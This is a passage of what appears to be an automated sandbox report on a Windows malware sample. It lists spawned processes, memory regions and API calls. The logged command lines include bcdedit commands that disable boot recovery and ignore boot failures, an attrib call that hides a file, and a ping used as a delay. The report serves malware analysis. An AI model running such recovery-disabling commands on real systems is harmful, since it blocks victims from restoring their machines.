"c:\\windows\\system32\\msctf.dll") Thread: id = 637 os_tid = 0xb74 Process: id = "446" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x7ea16ce0" os_pid = "0xa5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "bcdedit.exe /set {default} recoveryenabled no " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28685 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28686 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28687 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28688 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28689 start_va = 0xa20000 end_va = 0xa69fff entry_point = 0xa20000 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 28690 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28691 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type 
= mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28692 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28693 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28694 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28695 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28696 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28697 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28698 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28699 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 28700 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28701 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28702 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = 
mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28703 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28704 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28705 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28706 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 638 os_tid = 0xa3c Process: id = "447" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16180" os_pid = "0xcc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "444" os_parent_pid = "0xacc" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28729 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28730 start_va = 0x30000 
end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28731 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28732 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 28733 start_va = 0x660000 end_va = 0x666fff entry_point = 0x660000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28734 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28735 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28736 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28737 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28738 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28739 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28740 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28741 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = 
"private_0x00000000000a0000" filename = "" Region: id = 28742 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28743 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 28744 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28745 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28746 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28747 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28748 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28749 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28750 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 28751 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28752 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28753 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28754 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28755 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28756 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 28757 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28758 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 640 os_tid = 0xb70 Process: id = "448" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x7ea16ce0" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = 
"0xe7c" cmd_line = "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28707 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28708 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 28709 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 28710 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 28711 start_va = 0xe90000 end_va = 0xed9fff entry_point = 0xe90000 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 28712 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28713 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28714 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: 
id = 28715 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 28716 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28717 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28718 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28719 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28720 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28721 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 28722 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28723 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28724 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28725 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" 
(normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28726 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28727 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28728 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 639 os_tid = 0xac4 Process: id = "449" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16ce0" os_pid = "0xadc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "ping -n 10 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28759 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28760 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28761 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28762 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000070000" filename = "" Region: id = 28763 start_va = 0x4c0000 end_va = 0x4c7fff entry_point = 0x4c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 28764 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28765 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28766 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28767 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28768 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28769 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28770 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28771 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28772 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28773 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000360000" filename = "" Region: id = 28774 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 28775 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 28776 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28777 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28778 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 28779 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28780 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28781 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28782 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = 
"msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28783 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28784 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28785 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 28786 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28787 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28788 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28789 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 28790 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28791 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Region: id = 28792 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 28793 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 28794 start_va = 0x120000 end_va = 0x122fff entry_point = 0x120000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 28795 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 28796 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 28797 start_va = 0x370000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 28798 start_va = 0x4d0000 end_va = 0x10cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 28799 start_va = 0x10d0000 end_va = 0x139efff entry_point = 0x10d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 28800 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 28801 start_va = 0x13a0000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 28802 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = 
"\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 28803 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 28804 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 28805 start_va = 0x13a0000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 28806 start_va = 0x1500000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 28837 start_va = 0x14c0000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 28838 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 28839 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 28852 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 28853 start_va = 0x1540000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 28864 start_va = 0x16c0000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 28865 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = 
private name = "private_0x000000007ffdc000" filename = "" Region: id = 28876 start_va = 0x13b0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 28877 start_va = 0x1440000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 28878 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 641 os_tid = 0xb90 [0195.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafccc | out: lpSystemTimeAsFileTime=0xafccc*(dwLowDateTime=0xa951ad60, dwHighDateTime=0x1d440a9)) [0195.451] GetCurrentProcessId () returned 0xadc [0195.451] GetCurrentThreadId () returned 0xb90 [0195.451] GetTickCount () returned 0x376e3 [0195.451] QueryPerformanceCounter (in: lpPerformanceCount=0xafcc4 | out: lpPerformanceCount=0xafcc4*=25224013973) returned 1 [0195.452] GetModuleHandleA (lpModuleName=0x0) returned 0x4c0000 [0195.452] __set_app_type (_Type=0x1) [0195.452] __p__fmode () returned 0x76b331f4 [0195.452] __p__commode () returned 0x76b331fc [0195.452] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4c2ae1) returned 0x0 [0195.452] __getmainargs (in: _Argc=0x4c50d4, _Argv=0x4c50dc, _Env=0x4c50d8, _DoWildCard=0, _StartInfo=0x4c50e8 | out: _Argc=0x4c50d4, _Argv=0x4c50dc, _Env=0x4c50d8) returned 0 [0195.452] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0195.489] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x4c5440 | out: lpWSAData=0x4c5440) returned 0 [0195.496] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xaf75c | out: phkResult=0xaf75c*=0x58) returned 0x0 [0195.496] RegQueryValueExA (in: hKey=0x58, 
